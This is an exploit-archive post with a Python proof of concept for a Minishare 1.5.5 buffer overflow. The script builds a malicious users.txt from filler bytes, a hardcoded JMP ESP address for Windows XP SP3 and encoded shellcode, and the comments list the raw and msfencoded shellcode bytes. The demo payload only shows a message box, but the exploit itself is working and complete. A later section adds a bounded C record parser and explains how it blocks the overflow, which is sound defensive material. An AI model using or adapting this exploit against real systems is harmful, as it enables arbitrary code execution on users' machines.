
[local exploits] - Minishare 1.5.5 Buffer Overflow Vulnerabi

Posted on 02 November 2010

<pre>
=========================================================
Minishare 1.5.5 Buffer Overflow Vulnerability (users.txt)
=========================================================

# Exploit Title: Minishare 1.5.5 Buffer Overflow Vulnerability (users.txt)
# Date: 11/02/2010
# Author: Chris Gabriel
# Software Link: http://sourceforge.net/projects/minishare
# Version: 1.4.0 - 1.5.5
# Tested on: Windows XP SP3 EN
# CVE:

# MessageBoxA TITLE=HAX TEXT=HAX WIN XP SP3 Shellcode
# \xbb\x48\x41\x58\x00\x53\x89\xe6\x31\xc0\x50\x56\x56\x50
# \xb8\xea\x07\x45\x7e\xff\xd0

# msfencoded MessageBoxA shellcode
# [*] x86/shikata_ga_nai succeeded with size 48 (iteration=1)
# \x33\xc9\xb1\x06\xda\xd2\xd9\x74\x24\xf4\x5b\xb8\x1f\xf9
# \xf2\x17\x83\xeb\xfc\x31\x43\x10\x03\x43\x0f\x1b\x07\xac
# \x67\x9a\xb0\xd3\x24\x95\xa7\xe5\x0a\xf5\x71\x50\xda\x4e
# \x97\x5b\x9f\xd0\x97\xb4

# ALPHA3.py x86 ascii uppercase ESP --input="shellcode-encoded"
# alpha3 encoded ascii uppercase MessageBoxA Shellcode
shellcode = (
"TYVTX10X41PZ41H4A4H1TA91TAFVTZ32PZNBFZDQE02D"
"QF0D13DJE1F4847029R9VNN0D668M194A0I5G5L2G3W3"
"M3Z19LN2A2Z1G0N2K0N4YK0JO9L9Q1S36403F0G3V2K1"
"Q9S123I1Y3N9R8M4E0G"
)

# 78 bytes till EIP
# 82 bytes till ESP
# 304 for payload

# EIP OVERWRITE
buff = "A" * 78
buff += "\x4b\x49\x48\x7e" #7E48494B JMP ESP in user32.dll win xp sp3
buff += shellcode

try:
    f = open("users.txt",'w')
    f.write(buff)
    f.close()
    print "[+] Vulnerable file created! Place the 'users.txt' file in the Minishare directory and run the program... "
except:
    print "[-] Error occured!"

# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-11-02]
</pre>
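On the defensive side, the PoC's comments ("78 bytes till EIP") describe an unbounded copy of a users.txt record into a fixed-size stack buffer. The block below is an added example, not code from the original page or from MiniShare: a bounded record parser that rejects oversized records whole. The names `load_records`, `load_result`, `show` and the `REC_MAX` value are assumptions, and the file contents are assumed to have been read into memory already.

```c
#include <stdio.h>
#include <string.h>

/* Assumed cap: the page gives only "78 bytes till EIP", not the real
   buffer size, so 64 is a deliberately stricter placeholder. */
#define REC_MAX 64

struct load_result { long accepted, rejected; };

/* Hypothetical parser for users.txt-style contents, one record per line.
   A record longer than REC_MAX-1 bytes, or containing a NUL, is rejected
   whole rather than truncated or copied past the end of buf. */
struct load_result load_records(const char *data, size_t len,
                                void (*cb)(const char *))
{
    struct load_result r = {0, 0};
    char buf[REC_MAX];
    size_t n = 0;
    int invalid = 0;

    for (size_t i = 0; i <= len; i++) {
        int c = i < len ? (unsigned char)data[i] : EOF;
        if (c == '\r') continue;                 /* tolerate CRLF files */
        if (c == '\n' || c == EOF) {             /* end of record */
            if (invalid) r.rejected++;
            else if (n > 0) { buf[n] = '\0'; if (cb) cb(buf); r.accepted++; }
            n = 0; invalid = 0;
        } else if (c == '\0' || n == REC_MAX - 1) {
            invalid = 1;                         /* buffer full: stop copying */
        } else if (!invalid) {
            buf[n++] = (char)c;
        }
    }
    return r;
}

static void show(const char *rec) { printf("accepted: %s\n", rec); }

int main(void)
{
    /* Constructed sample: two short records, then 400 filler bytes with no
       newline (one oversized record, the shape of the file the PoC writes). */
    char sample[420] = "user-one\r\nuser-two\n";
    size_t n = strlen(sample);
    memset(sample + n, 'A', 400);
    struct load_result r = load_records(sample, n + 400, show);
    printf("accepted=%ld rejected=%ld\n", r.accepted, r.rejected);
    return 0;
}
```

The file the PoC writes consists entirely of printable ASCII, so a filter on non-printable bytes would not flag it; the length bound is what stops the record from reaching the saved return address.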

 
